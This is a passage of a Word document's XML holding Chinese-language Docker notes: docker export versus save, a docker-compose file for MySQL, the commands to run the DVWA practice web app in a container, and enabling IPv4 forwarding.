    <w:p w14:paraId="454F260F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5，应用场景不同</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873E9EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用场景：主要用来制作基础镜像，比如我们从一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> ubuntu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像启动一个容器，然后安装一些软件和进行一些设置后，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存为一个基础镜像。然后，把这个镜像分发给其他人使用，比如作为基础的开发环境。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E16F07" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">docker save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用场景：如果我们的应用是使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker-compose.yml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编排的多个镜像组合，但我们要部署的客户服务器并不能连外网。这时就可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker save </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将用到的镜像打个包，然后拷贝到客户服务器上使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> docker load </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>载入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206D4227" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A8F8725" w14:textId="450D8815" w:rsidR="004C452C" w:rsidRDefault="00EA490A" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="123" w:name="_Toc159779584"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="007B0ED9">
        <w:t>-compose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="003D0A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：常用的</w:t>
      </w:r>
      <w:r w:rsidR="003D0A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidR="003D0A4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="123"/>
    </w:p>
    <w:p w14:paraId="0F405A08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://registry.hub.docker.com/_/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA923D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205903E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11F6A0CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的文件名称是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker-compose-basic.yml,MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据挂载到宿主机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/root/basic/mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8314E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库一般需要将数据挂载到宿主机上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以免容器损坏导致数据丢失</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C52872" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EAD9167" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>version: '3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AFFD27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618F87D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A8E81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  mysql:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19D76F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    image: mysql:5.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6A9EBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    container_name: mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E584ADD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D05E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - MYSQL_ROOT_PASSWORD=1qaz@WSX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1783D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - TZ=Asia/Shanghai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29E004" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - SET_CONTAINER_TIMEZONE=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A83DEAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - CONTAINER_TIMEZONE=Asia/Shanghai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002A243" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2017B125" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./mysql/conf:/etc/mysql/conf.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F392E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./mysql/conf:/etc/mysql/mysql.conf.d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6656DC03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./mysql/data:/var/lib/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D435F38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - ./mysql/logs:/var/log/mysql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA8B20D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - /etc/localtime:/etc/localtime:ro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC353DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66755FDC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      - 13306:3306</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB708F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    restart: always</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649FE88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB6866B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于修改配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my.ini)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种文件，上面已经指向了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/mysql/mysql.conf.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/etc/mysql/conf.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两处配置文件的目录，但是完全可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>在上面的挂载目录下新建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。因为我们的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cnf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件也是配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F76A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D7CDC29" w14:textId="33844180" w:rsidR="001D1FD4" w:rsidRDefault="00CD0004" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="124" w:name="_Toc159779585"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="6E564474" w14:textId="77777777" w:rsidR="00CD0004" w:rsidRDefault="00CD0004" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593A0AF0" w14:textId="4A607910" w:rsidR="00A238A1" w:rsidRDefault="00A238A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拉取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C27EA4" w14:textId="77777777" w:rsidR="00A238A1" w:rsidRDefault="00A238A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  docker pull vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A794BDE" w14:textId="77777777" w:rsidR="00A238A1" w:rsidRDefault="00A238A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6948256C" w14:textId="4D1E6E9B" w:rsidR="00A238A1" w:rsidRDefault="00A238A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行这个镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F64C17" w14:textId="0FD0822B" w:rsidR="001D1FD4" w:rsidRDefault="00A238A1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  docker run --rm -it -p 80:80 vulnerables/web-dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C23C588" w14:textId="77777777" w:rsidR="001D1FD4" w:rsidRDefault="001D1FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD9B374" w14:textId="77777777" w:rsidR="001D1FD4" w:rsidRDefault="001D1FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55944DE6" w14:textId="77777777" w:rsidR="001D1FD4" w:rsidRDefault="001D1FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A16A99" w14:textId="77777777" w:rsidR="001D1FD4" w:rsidRDefault="001D1FD4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1E1A05" w14:textId="78AA3471" w:rsidR="001D1FD4" w:rsidRDefault="00F2590D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="125" w:name="_Toc159779586"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载使用代理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="34C4EDDF" w14:textId="77777777" w:rsidR="00F2590D" w:rsidRDefault="00F2590D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D384B09" w14:textId="50D0BB41" w:rsidR="00F2590D" w:rsidRDefault="00F2590D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F2590D">
        <w:t>https://cloud.tencent.com/developer/article/1806455</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0EFC0" w14:textId="77777777" w:rsidR="00F2590D" w:rsidRDefault="00F2590D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B6B636D" w14:textId="77777777" w:rsidR="003A06DA" w:rsidRDefault="003A06DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F42D71E" w14:textId="77777777" w:rsidR="003A06DA" w:rsidRDefault="003A06DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E66CB3" w14:textId="77777777" w:rsidR="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59E4CB6B" w14:textId="0E7A1F54" w:rsidR="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="126" w:name="_Toc159779587"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipv</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转发：无法访问到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>映射出来的端口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="1314B04E" w14:textId="77777777" w:rsidR="003A06DA" w:rsidRDefault="003A06DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BEF5E97" w14:textId="42248728" w:rsidR="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB53D3">
        <w:t>echo 1 &gt;/proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4785BB6B" w14:textId="77777777" w:rsidR="00EB53D3" w:rsidRPr="00EB53D3" w:rsidRDefault="00EB53D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B643961" w14:textId="77777777" w:rsidR="00B80FC9" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5037925C" w14:textId="77777777" w:rsidR="00B80FC9" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>service docker restart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6C66F" w14:textId="4EC2F9C7" w:rsidR="00B80FC9" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C27898F" w14:textId="77777777" w:rsidR="00B80FC9" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永久开启路由功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3257DF" w14:textId="73D508E4" w:rsidR="00F2590D" w:rsidRDefault="00B80FC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>vim /etc/sysctl.conf</w:t>
      </w:r>
    </w:p>
